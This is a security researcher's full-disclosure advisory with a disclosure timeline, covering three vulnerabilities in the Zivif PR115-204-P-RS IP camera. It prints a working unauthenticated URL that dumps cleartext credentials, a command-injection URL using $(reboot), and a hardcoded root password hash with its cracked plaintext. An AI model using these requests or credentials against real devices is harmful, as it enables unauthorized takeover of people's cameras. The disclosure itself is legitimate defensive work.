Zivif PR115-204-P-RS 2.3.4.2103 Bypass / Command Injection / Hardcoded Password
Posted on 13 December 2017
Attack vector: Remote Authentication: None Researcher: Silas Cutler `p1nk` <silas.cutler@blacklistthisdomain.com> Release date: December 10, 2017 Full Disclosure: 90 days CVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107 Vulnerable Device: Zivif PR115-204-P-RS Version: V2.3.4.2103 Timeline: 1 September 2017: Initial alerting to Zivif 1 September 2017: Zivif contact established. 3 September 2017: Details provided. 7 September 2017: Confirmation of vulnerabilities from Zivif 5 December 2017: Public note on Social Media CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic. 10 December 2017: This email -[Overview]- Implementation of access controls is Zivif cameras is severely lacking. As a result, CGI functions can be called directly, bypassing authentication checks. This was first identified with the following request (CVE-2017-17106) http://<Camera Address>/web/cgi-bin/hi3510/param.cgi?cmd=getuser Cameras respond to this with: var name0="admin"; var password0="admin"; var authLevel0="255"; var name1="guest"; var password1="guest"; var authLevel1="3"; var name2="admin2"; var password2="admin"; var authLevel2="3"; var name3=""; var password3=""; var authLevel3="3"; var name4=""; var password4=""; var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3"; var name6=""; var password6=""; var authLevel6="3"; var name7=""; var password7=""; var authLevel7="3"; var name8=""; var password8=""; var authLevel8="0"; var name9=""; var password9=""; var authLevel9="0 Credentials are returned in cleartext to the requester. In exploring, unauthenticated remote command injection is possible using (CVE-2017-17105) http://<Camera IP>/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time="1504225666237"&-url=$(reboot) Command results are not returned, however are executed by the system. One last findings was the /etc/passwd file contains the following hard-coded entry (CVE-2017-17107): root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh The encrypted password is cat1029. (none) login: root Password: Login incorrect (none) login: root Password: Welcome to SONIX. u@h:W$ Because of the way the file system is structured, changing this password requires more work then running passwd. -[Note]- The hi3510 is shared with a couple other cameras I'm exploring. The motd saying /Welcome to SONIX/ has lead me to speculate parts of this firmware may be shared with other cameras. -Silas